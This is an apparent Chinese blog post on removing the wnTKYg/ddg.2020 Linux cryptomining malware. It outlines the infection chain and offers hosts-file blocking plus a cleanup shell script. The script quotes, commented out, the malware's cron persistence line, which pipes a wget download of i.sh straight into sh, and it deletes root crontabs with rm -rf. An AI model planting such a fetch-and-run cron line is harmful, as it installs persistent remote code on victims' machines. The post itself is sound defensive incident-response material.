近期 wnTKYg Linux 恶意软件简介

源头 : /tmp/ddg.2020


1.下载配置数据库,用来攻击其他电脑;
2.从配置中获取http服务器,下载i.sh的脚本;
3.将脚本插入到系统的cron中,定时执行;
4.执行脚本,将挖矿程序下载到本地,开始挖矿;

根据以上流程,可以从各个点来切断传播;

1. 切断第一步,让其无法获取配置文件,程序会先获取自身所在电脑的公网IP,

当获取不到公网IP之后,就没有然后了。。。以下从几个域名中可获取公网IP:

ident.me
v4.ident.me
ipinfo.io
ipecho.net
ipv4.icanhazip.com
ifconfig.co

在linux上 加入到 /etc/hosts

127.0.0.1  v4.ident.me

127.0.0.1  ipinfo.io
127.0.0.1  ipecho.net
127.0.0.1  ipv4.icanhazip.com
127.0.0.1  ifconfig.co

2.切断第三步,让其无法自动执行

删除该路径下面的所有文件 /var/spool/cron 

3.切断第四步,删除所有恶意程序

删除 /tmp/ddg.2020 /tmp/wnTKYg




必须要立马修改密码, 清除脚本

#!/bin/sh
#ver 1.1
chmod -x /tmp/ddg.2020 /tmp/wnTKYg
killall ddg.2020 wnTKYg
echo "as" > /tmp/ddg.2020
echo "as" > /tmp/wnTKYg
killall ddg.2020 wnTKYg
ps auxf | grep -v grep | grep ddg. | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep wnTKYg | awk '{print $2}' | xargs kill

rm -rf  /var/spool/cron/root

rm -rf  /var/spool/cron/crontabs/root

#echo "* * * * * wget -q -O- http://10.0.22.61:9443/i.sh | sh" >> /var/spool/cron/crontabs/root

killall ddg.2020 wnTKYg

rm -rf /tmp/ddg.2020
rm -rf /tmp/wnTKYg
killall ddg.2020 wnTKYg
ps auxf | grep -v grep | grep ddg. | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep wnTKYg | awk '{print $2}' | xargs kill


=勿转载~~
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值